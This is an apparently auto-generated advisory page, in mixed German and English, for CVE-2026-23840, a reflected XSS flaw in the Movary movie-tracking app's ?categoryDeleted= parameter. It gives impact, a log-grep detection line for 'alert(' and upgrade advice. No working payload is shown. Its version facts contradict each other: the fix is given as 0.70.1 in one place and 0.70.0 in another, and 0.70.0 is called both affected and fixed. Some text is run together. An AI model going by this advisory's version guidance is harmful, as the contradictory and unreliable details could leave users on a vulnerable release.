Plattform
javascript
Komponente
movary
Behoben in
0.70.1
CVE-2026-23840 describes a critical Cross-Site Scripting (XSS) vulnerability affecting Movary, a web application designed for tracking and rating movies. This flaw allows attackers to inject malicious scripts into the application, potentially leading to session hijacking and data theft. The vulnerability impacts versions of Movary prior to 0.70.0, and a patch has been released in version 0.70.0.
The XSS vulnerability in Movary arises from insufficient input validation within the ?categoryDeleted= parameter. An attacker can craft a malicious URL containing a JavaScript payload and, when a user clicks on this link, the script will execute within their browser context. This allows the attacker to steal cookies, redirect the user to a phishing site, or even deface the application. The potential impact is significant, as it can compromise user accounts and sensitive data stored within the Movary application. Successful exploitation could lead to widespread data breaches and reputational damage for organizations using Movary.
CVE-2026-23840 was publicly disclosed on 2026-01-19. No public proof-of-concept (PoC) code has been released as of this writing, but the vulnerability's ease of exploitation suggests a moderate risk of exploitation. The CVSS score of 9.3 (CRITICAL) indicates a high potential for exploitation and significant impact. It is not currently listed on the CISA KEV catalog.
Organizations and individuals using Movary to track their movie history are at risk. This includes users who rely on the application for personal entertainment tracking and those who deploy Movary on shared hosting environments, where vulnerabilities can be more easily exploited due to limited control over the server configuration.
• javascript: Inspect the application's JavaScript code for instances where the ?categoryDeleted= parameter is used without proper sanitization. Look for functions that directly insert the parameter's value into the DOM without encoding.
• generic web: Monitor access logs for requests containing suspicious JavaScript payloads in the ?categoryDeleted= parameter. Example:
grep -i 'alert\(' /var/log/apache2/access.logdisclosure
Exploit-Status
EPSS
0.13% (32% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-23840 is to immediately upgrade Movary to version 0.70.0 or later, which includes the necessary input validation fixes. If upgrading is not immediately feasible, consider implementing a Web Application Firewall (WAF) rule to filter requests containing suspicious characters or patterns in the ?categoryDeleted= parameter. Additionally, carefully review and sanitize any user-supplied input within the application to prevent future XSS vulnerabilities. After upgrading, confirm the fix by attempting to inject a simple JavaScript payload into the ?categoryDeleted= parameter and verifying that it is properly sanitized.
Aktualisieren Sie Movary auf Version 0.70.0 oder höher. Diese Version behebt die Cross-site Scripting (XSS) Schwachstelle, indem sie die Eingaben des Parameters `categoryDeleted` korrekt validiert. Das Update verhindert, dass Angreifer bösartige Skripte in Ihrem Browser ausführen.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-23840 is a critical Cross-Site Scripting (XSS) vulnerability in Movary versions prior to 0.70.0, allowing attackers to inject malicious scripts.
You are affected if you are using Movary version 0.70.0 or earlier. Upgrade to 0.70.0 to mitigate the risk.
Upgrade Movary to version 0.70.0 or later. Consider a WAF rule to filter suspicious requests as a temporary measure.
There are no confirmed reports of active exploitation at this time, but the vulnerability's severity warrants immediate attention.
Refer to the Movary project's official website or GitHub repository for the latest security advisories and release notes.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.